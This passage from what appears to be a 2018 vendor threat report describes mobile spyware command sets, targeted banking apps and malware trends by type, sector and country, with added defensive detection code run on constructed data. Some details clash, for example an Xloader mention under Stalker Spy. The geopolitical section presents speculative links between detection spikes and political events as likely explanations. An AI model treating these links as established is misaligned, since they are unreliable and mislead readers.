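judge the days after it. SAMPLE_COUNTS is constructed data, not telemetry.
"""
from statistics import median

# Constructed daily detection counts for one country (index 0 = first day
# of the period); day 13 carries the kind of spike the report eyeballs.
SAMPLE_COUNTS = [
    120, 131, 118, 125, 140, 122, 119, 133, 128, 124,
    121, 135, 129, 1650, 132, 127, 138, 123, 130, 126,
]


def robust_spikes(counts, window=7, threshold=6.0, min_history=5):
    """Return [(day_index, count, score)] for days whose count exceeds the
    rolling baseline by more than `threshold` scaled MADs.

    1.4826 * MAD estimates one standard deviation for normal data; the
    floor of 1.0 avoids dividing by zero on a perfectly flat series.
    """
    spikes = []
    for i in range(min_history, len(counts)):
        prior = counts[max(0, i - window):i]
        base = median(prior)
        mad = median(abs(x - base) for x in prior)
        spread = max(1.4826 * mad, 1.0)
        score = (counts[i] - base) / spread
        if score > threshold:
            spikes.append((i, counts[i], round(score, 1)))
    return spikes


if __name__ == "__main__":
    for day, count, score in robust_spikes(SAMPLE_COUNTS):
        print(f"day {day}: {count} detections, {score} scaled MADs above baseline")
```

On the constructed series only day 13 is reported. A median/MAD baseline is used instead of mean/standard deviation because one huge day would otherwise raise the mean and variance for the following week and mask a second, smaller spike. Real detection series also carry a weekday/weekend rhythm, so a production version would compare each day against the same weekday in prior weeks rather than the immediately preceding days.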

Global Threat Report Q2 2018 Edition

Page 73 of 73

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating focus on hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


After infection, Xloader connects to its C&C server and executes the following commands:

- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Set Wi-Fi to always turned on

Version 2 can execute additional commands:

- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

Figure: Disguises of Stalker Spy (app names under which it is distributed): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب, اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android, CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

In addition to the usual must-have spyware feature set, Xloader can remotely turn on the microphone on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Figure: Disguises of Mystery Bot. Version 1: Adobe Flash Player. Version 2: Flash Player

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

Figure: Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

- contacts: get contact details and email id
- Mute: set action to mute
- Mms: get MMS content
- info: get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Figure: Disguises of RedAlert. Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber. Version 2: Update Google Market, Flash Player, Tactic, FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates in Iran. It uses third-party app stores, social networks and messengers for spreading.

Figure: Disguises of Hero Rat. Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام, ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Its code is available on a Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in a variety of disguises, named below.

Figure: Disguises of Sonvpay. Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Figure: Disguises of CoinHive. Version 1: Netflix Hack, Instagram Hack. Version 2: TSF Launcher. Version 3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Figure: Android-targeted malware in April

4.2.2 May 2018

Figure: Android-targeted malware in May

4.2.3 June 2018

Figure: Android-targeted malware in June

5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
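The behaviour attributed to Starter above, creating an account and adding it to the administrator group, leaves a recognisable pair of entries in the Windows Security log. The Python correlation below is an added example, not Comodo's code or a Comodo detection rule: it pairs event 4720 (user account created) with a later 4732 (member added to a security-enabled local group) for the same SID within a short window. Event IDs 4720 and 4732 are real Windows Security event IDs; the SAMPLE_EVENTS lines are constructed in a flattened key=value form for this example and are not real exported events, and the group set, window and function names are this example's own choices.

```python
"""Correlate Windows Security events for 'new local account promptly added to
Administrators', the trace the Starter behaviour described above would leave.

Added example, not Comodo's code. Event IDs 4720 (user account created) and
4732 (member added to a security-enabled local group) are real Windows
Security event IDs; the SAMPLE_EVENTS lines are constructed in a flattened
key=value form for this example and are not real exported events.
"""
import re
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # New account, then added to Administrators 3 seconds later: suspicious.
    '2018-06-03T09:14:02 EventID=4720 TargetUserName=svc_remote '
    'TargetSid=S-1-5-21-1111-2222-3333-1105 SubjectUserName=alice',
    '2018-06-03T09:14:05 EventID=4732 TargetUserName=Administrators '
    'MemberSid=S-1-5-21-1111-2222-3333-1105 SubjectUserName=alice',
    # New account added to a non-privileged group: not alerted on.
    '2018-06-03T11:30:00 EventID=4720 TargetUserName=intern07 '
    'TargetSid=S-1-5-21-1111-2222-3333-1106 SubjectUserName=helpdesk',
    '2018-06-03T11:30:20 EventID=4732 TargetUserName="Remote Desktop Users" '
    'MemberSid=S-1-5-21-1111-2222-3333-1106 SubjectUserName=helpdesk',
    # New account promoted an hour later by a ticketed change: outside window.
    '2018-06-03T14:00:00 EventID=4720 TargetUserName=bob.admin '
    'TargetSid=S-1-5-21-1111-2222-3333-1107 SubjectUserName=helpdesk',
    '2018-06-03T15:02:10 EventID=4732 TargetUserName=Administrators '
    'MemberSid=S-1-5-21-1111-2222-3333-1107 SubjectUserName=helpdesk',
]

PRIVILEGED_GROUPS = {"Administrators"}  # extend with the estate's own tier-0 groups
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line):
    """Parse one flattened line into a dict; quoted values may contain spaces."""
    ts_str, rest = line.split(" ", 1)
    fields = {}
    for m in FIELD_RE.finditer(rest):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    fields["ts"] = datetime.fromisoformat(ts_str)
    return fields


def find_fast_admin_promotions(lines, max_gap=timedelta(minutes=10)):
    """Pair each 4720 with a later 4732 into a privileged group for the same SID
    within `max_gap`; SIDs are keyed on because account names can be reused."""
    created = {}  # SID -> (account name, creation time)
    hits = []
    for ev in (parse_event(line) for line in lines):
        if ev.get("EventID") == "4720":
            created[ev["TargetSid"]] = (ev["TargetUserName"], ev["ts"])
        elif ev.get("EventID") == "4732" and ev.get("TargetUserName") in PRIVILEGED_GROUPS:
            sid = ev.get("MemberSid")
            if sid in created:
                name, t0 = created[sid]
                gap = ev["ts"] - t0
                if gap <= max_gap:
                    hits.append({"account": name, "sid": sid,
                                 "group": ev["TargetUserName"],
                                 "seconds": gap.total_seconds(),
                                 "by": ev.get("SubjectUserName")})
    return hits


if __name__ == "__main__":
    for h in find_fast_admin_promotions(SAMPLE_EVENTS):
        print(f"ALERT: {h['account']} ({h['sid']}) added to {h['group']} "
              f"{h['seconds']:.0f}s after creation by {h['by']}")
```

Only the first pair in the sample is reported; the second goes to a non-privileged group and the third falls outside the ten-minute window. The correlation keys on the SID rather than the account name because names can be recreated, and it records the SubjectUserName so that an analyst can see which existing account (or service) performed the promotion.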

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
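Because MUPX is a modified UPX, the stock UPX0/UPX1 section names may or may not survive in a sample, but the byte entropy of the compressed or encrypted section does. The Python snippet below is an added example, not Comodo's code or its detection logic: it scores a PE section table on both signals, the UPX-style names and the section-by-section entropy, and also flags the packer-typical layout of an empty first section followed by a high-entropy one. The two section tables are constructed for this example to mimic those layouts and are not taken from real samples; the threshold and function names are this example's own choices.

```python
"""Packer indicators for a PE section table: UPX-style section names plus
byte entropy, which survives even when a modified UPX (MUPX) renames sections.

Added example, not Comodo's code. The section tables below are constructed
to mimic the layouts described (an empty first section followed by a
high-entropy one for the packed case); they are not taken from real samples.
"""
import math
import random


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def packer_indicators(sections, entropy_threshold=7.0):
    """Given [(section_name, raw_bytes), ...] in file order, return the list
    of indicator strings; an empty list means no packing signal was found."""
    indicators = []
    for idx, (name, raw) in enumerate(sections):
        if name.startswith("UPX"):
            indicators.append(f"upx_section_name:{name}")
        # A packer's unpack target has no raw data on disk; the payload sits in
        # the next section and is expanded into this one at run time.
        if idx == 0 and len(raw) == 0 and len(sections) > 1 and sections[1][1]:
            indicators.append("empty_first_section_with_payload_after_it")
        ent = shannon_entropy(raw)
        if ent >= entropy_threshold:
            indicators.append(f"high_entropy:{name}:{ent:.2f}")
    return indicators


# Constructed UPX-style layout: deterministic pseudo-random bytes stand in
# for the compressed payload (compressed data is near-uniform).
_rng = random.Random(7)
PACKED_SECTIONS = [
    ("UPX0", b""),
    ("UPX1", bytes(_rng.getrandbits(8) for _ in range(4096))),
    (".rsrc", b"\x00" * 512 + b"MZ" * 64),
]

# Constructed unpacked layout: repetitive code-like and string-like bytes.
PLAIN_SECTIONS = [
    (".text", bytes([0x55, 0x8B, 0xEC, 0xC3]) * 1000),
    (".data", b"hello world\x00" * 100),
]


if __name__ == "__main__":
    for label, secs in (("packed", PACKED_SECTIONS), ("plain", PLAIN_SECTIONS)):
        print(label, packer_indicators(secs) or ["no indicators"])
```

On the constructed packed table the name check fires for both UPX sections, the layout check fires for the empty first section, and the entropy check fires only for the payload section (the resource section stays well below 7 bits per byte); the plain table produces no indicators. High entropy alone is not proof of packing, since legitimate installers and media-carrying resources are also dense, which is why a real triage pipeline weighs it together with layout and name signals rather than acting on it in isolation.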

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

